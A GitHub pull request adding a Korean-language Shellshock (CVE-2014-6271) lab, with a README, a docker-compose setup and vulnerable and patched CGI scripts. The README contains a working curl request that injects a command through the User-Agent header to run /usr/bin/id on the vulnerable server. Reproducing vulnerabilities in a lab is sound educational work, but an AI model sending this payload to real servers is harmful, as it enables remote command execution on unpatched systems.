Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[이동현/moonadong]: bash CVE-2014-6271 분석 코드 및 결과 #178

Open
wants to merge 3 commits into
base: main
Choose a base branch
from
Open

[이동현/moonadong]: bash CVE-2014-6271 분석 코드 및 결과 #178

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
3a66c83
add files
May 5, 2024
2e8a049
Update README.md
moonadong May 5, 2024
78cf59b
[이동현/moonadong]: bash CVE-2014-6271 분석 코드 및 결과
moonadong May 5, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
46 changes: 46 additions & 0 deletions bash/CVE-2014-6271/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
# CVE-2014-6271

취약점 설명

CVE-2014-6271은 bash에서 발견된 보안 취약점으로 'Shellshock'라는 이름으로 알려져있다. 이 취약점은 Bash가 환경 변수를 처리하는 과정에서 발생한다. 특히 bash가 함수를 환경 변수로부터 받을 때, 뒤에 따라오는 추가 명령을 실행하는 문제가 있다.

환경 구성 및 실행

```
docker compose build
docker compose up -d
```
위 명령어를 실행하여 테스트 환경을 구축할 수 있다.
이를 통해 두 개의 cgi 스크립트가 호스팅되는 웹 서버 환경을 만든다:

safe.cgi - 최신 Bash를 사용하여 생성된 CGI 스크립트로, Shellshock 취약점에 안전하다.
victim.cgi - Bash 4.3을 사용하여 생성된 CGI 스크립트로, Shellshock 취약점에 취약하다.

취약점 확인

사용자가 HTTP요청 도구를 사용하여 victim.cgi에 접근할 때 User-Agent부분에 취약점을 이용하여 명령어를 포함시킨 요청을 보낸다.
이 요청이 실행될 경우 취약점이 있는 bash를 사용하는 서버에서 명령어가 실행된다.
반면 safe.cgi는 패치가 진행된 bash를 사용하여 동일한 요청에도 영향을 받지 않는 것을 확인할 수 있다.

아래 명령어를 통해 이를 확인할 수 있다.

1. 취약한 bash의 경우
```
curl -v http://your_ip_address:8080/victim.cgi -H "User-Agent: () { foo; }; echo; echo; /usr/bin/id" --output response.txt
cat response.txt
```
아래와 같이 '/usr/bin/id' 명령이 실행된 것을 확인할 수 있다.
![](victim_result.png)

2. 안전한 bash의 경우
```
curl -v http://your_ip_address:8080/safe.cgi -H "User-Agent: () { foo; }; echo; echo; /usr/bin/id" --output response.txt
cat response.txt
```
아래와 같이 '/usr/bin/id' 명령이 실행되지 않는 것을 확인할 수 있다.
![](safe_result.png)

정리

이 취약점은 공격자가 원하는 코드를 원격으로 실행할 수 있도록 하여, 취약한 시스템에 대한 제어가 가능하게 한다. bash를 사용하는 시스템이 매우 많아 이 취약점은 광범위한 영향을 끼쳤다.
이러한 취약점에 대응하기 위해 bash의 버전을 업데이트 하여 사용하여야 하고, 취약한 bash를 사용하는 시스템들을 점검하여야 한다.
9 changes: 9 additions & 0 deletions bash/CVE-2014-6271/docker-compose.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
version: '2'
services:
web:
image: vulhub/bash:4.3.0-with-httpd
ports:
- "8080:80"
volumes:
- ./safe.cgi:/var/www/html/safe.cgi
- ./victim.cgi:/var/www/html/victim.cgi
15 changes: 15 additions & 0 deletions bash/CVE-2014-6271/safe.cgi
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
echo '<title>Bash ShellShock</title>'
echo '</head>'
echo '<body>'
echo '<p>'
echo 'Hello world'
echo '</p>'
echo '</body>'
echo '</html>'
exit 0
Binary file added bash/CVE-2014-6271/safe_result.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
15 changes: 15 additions & 0 deletions bash/CVE-2014-6271/victim.cgi
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
#!/usr/local/bash-4.3.0/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
echo '<title>Bash ShellShock</title>'
echo '</head>'
echo '<body>'
echo '<p>'
echo 'Hello world'
echo '</p>'
echo '</body>'
echo '</html>'
exit 0
Binary file added bash/CVE-2014-6271/victim_result.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.